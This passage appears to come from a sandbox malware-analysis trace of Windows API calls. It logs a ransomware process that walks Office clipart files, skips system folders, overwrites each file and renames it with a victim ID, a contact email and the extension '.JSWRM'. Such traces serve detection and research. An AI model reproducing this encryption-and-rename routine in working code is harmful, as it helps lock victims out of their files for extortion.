lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0076.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0076.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0076.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0076.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0076.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0076.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0076.981] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0076.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0076.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0076.981] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7620, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00077_.WMF", cAlternateFileName="")) returned 1 [0076.981] lstrcmpiW (lpString1="FD00077_.WMF", lpString2=".") returned 1 [0076.981] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="..") returned 1 [0076.981] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="...") returned 1 [0076.982] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="windows") returned -1 [0076.982] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="recovery") returned -1 [0076.982] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="perflogs") returned -1 [0076.982] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="documents and settings") returned 1 [0076.982] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.982] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="system volume information") returned -1 [0076.982] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="msocache") returned -1 [0076.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0076.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00077_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00077_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00077_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0076.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00077_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00077_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00077_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0076.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0076.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0076.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.982] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30240) returned 1 [0076.982] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7620) returned 0x24d210 [0076.983] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7620, lpOverlapped=0x0) returned 1 [0076.986] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.986] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7620, lpOverlapped=0x0) returned 1 [0076.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.987] CloseHandle (hObject=0x314) returned 1 [0076.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0076.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0076.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0076.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0076.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0076.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0076.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0076.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0076.988] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0076.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0076.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0076.988] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x721c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00086_.WMF", cAlternateFileName="")) returned 1 [0076.988] lstrcmpiW (lpString1="FD00086_.WMF", lpString2=".") returned 1 [0076.988] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="..") returned 1 [0076.989] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="...") returned 1 [0076.989] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="windows") returned -1 [0076.989] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="recovery") returned -1 [0076.989] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="perflogs") returned -1 [0076.989] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="documents and settings") returned 1 [0076.989] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.989] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="system volume information") returned -1 [0076.989] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="msocache") returned -1 [0076.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0076.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00086_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00086_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00086_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0076.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00086_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00086_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00086_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0076.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0076.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0076.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.989] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29212) returned 1 [0076.989] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7210) returned 0x24d210 [0076.990] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7210, lpOverlapped=0x0) returned 1 [0076.994] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.994] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7210, lpOverlapped=0x0) returned 1 [0076.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.995] CloseHandle (hObject=0x314) returned 1 [0076.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0076.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0076.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0076.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0076.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0076.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0076.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.995] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0076.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0076.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0076.996] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3772, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00090_.WMF", cAlternateFileName="")) returned 1 [0076.996] lstrcmpiW (lpString1="FD00090_.WMF", lpString2=".") returned 1 [0076.996] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="..") returned 1 [0076.996] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="...") returned 1 [0076.996] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="windows") returned -1 [0076.996] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="recovery") returned -1 [0076.996] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="perflogs") returned -1 [0076.996] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="documents and settings") returned 1 [0076.996] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.996] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="system volume information") returned -1 [0076.996] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="msocache") returned -1 [0076.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00090_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00090_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00090_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0076.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00090_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00090_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00090_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0076.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0076.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0076.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0076.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.997] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14194) returned 1 [0076.997] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3770) returned 0x24d210 [0076.998] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3770, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3770, lpOverlapped=0x0) returned 1 [0077.003] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.003] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3770, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3770, lpOverlapped=0x0) returned 1 [0077.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.003] CloseHandle (hObject=0x314) returned 1 [0077.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0077.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0077.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0077.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0077.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0077.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0077.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.003] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0077.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0077.004] HeapFree (in: hHeap=0x1e0000, 